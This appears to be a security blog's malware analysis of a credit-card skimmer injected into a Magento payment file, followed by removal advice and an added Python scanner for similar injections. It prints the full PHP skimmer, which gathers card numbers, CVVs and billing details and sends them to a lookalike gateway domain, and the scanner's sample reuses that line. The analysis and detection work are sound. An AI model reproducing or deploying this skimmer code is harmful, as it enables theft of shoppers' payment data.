We recently found another malicious script used to steal credit cards that appears to be injected into compromised websites running Magento. It appears to send the information to payment.authorize.ga, a recently registered domain that mimics the Authorize.net payment gateway.
The malware was found in the file ./app/code/core/Mage/Payment/Model/Method/Cc.php:
$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
    $expmonth = '0'.$expmonth;
};
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = "infectedwebsite.com";
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
$ctx2 = stream_context_create(array(
    'http' => array(
        'timeout' => 3
    )
));
$tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
$ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);
We regularly detect malware that targets Magento payment modules:
- Phishing 2.0 – Credit Card Redirection on Compromised Sites
- Impacts of a Hack on a Magento Ecommerce Website
- Magento Platform Targeted By Credit Card Scrapers
In this case, all of the code from the line beginning with $object through the last line, which ends with $ctx2);, should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.
Other files could also contain this malicious code, or different code that re-adds the injection to the site even after the above is removed. Contact us if you have any questions and we will be happy to inspect the website.
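To check other files for the same pattern, the following added example (not part of the original post and not our scanner's code) flags PHP files that both read card fields and fetch a hard-coded remote URL, as the injection above does. The function names, the regular expressions and the two sample strings are assumptions made for this illustration.

```python
import os
import re

# Card-field getters used by the injected code shown above.
CARD_GETTERS = re.compile(
    r"->\s*(getCcNumber|getCcCid|getCcExpMonth|getCcExpYear)\s*\(")
# Remote fetch whose URL is a literal http(s) string, as in the sample.
REMOTE_FETCH = re.compile(
    r"@?\b(file_get_contents|fopen|curl_init)\s*\(\s*[\"'](https?://[^\"'/?\s$]+)",
    re.I)


def scan_source(text):
    """Return the indicators found in one PHP source string, or None."""
    getters = sorted({m.group(1) for m in CARD_GETTERS.finditer(text)})
    hosts = sorted({m.group(2).split("//", 1)[1]
                    for m in REMOTE_FETCH.finditer(text)})
    # Only the combination is reported: card data read AND a hard-coded fetch.
    if getters and hosts:
        return {"getters": getters, "hosts": hosts}
    return None


def scan_tree(root):
    """Walk a Magento docroot; return {path: indicators} for matching .php files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_source(fh.read())
            if result:
                hits[path] = result
    return hits


# Constructed samples: SAMPLE reuses three lines of the injection shown above,
# CLEAN is an invented benign line that must not match.
SAMPLE = '''
$data10 = $info->getCcNumber();
$data13 = $info->getCcCid();
$ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);
'''
CLEAN = '$ccType = $info->getCcType(); $x = file_get_contents($localPath);'

if __name__ == "__main__":
    import sys
    print(scan_source(SAMPLE))
    if len(sys.argv) > 1:
        for path, found in scan_tree(sys.argv[1]).items():
            print(path, found)
```

A legitimate gateway module that posts to its real processor with a literal URL will also match, so each reported host needs to be reviewed by hand; a variant that builds the URL at runtime will not match.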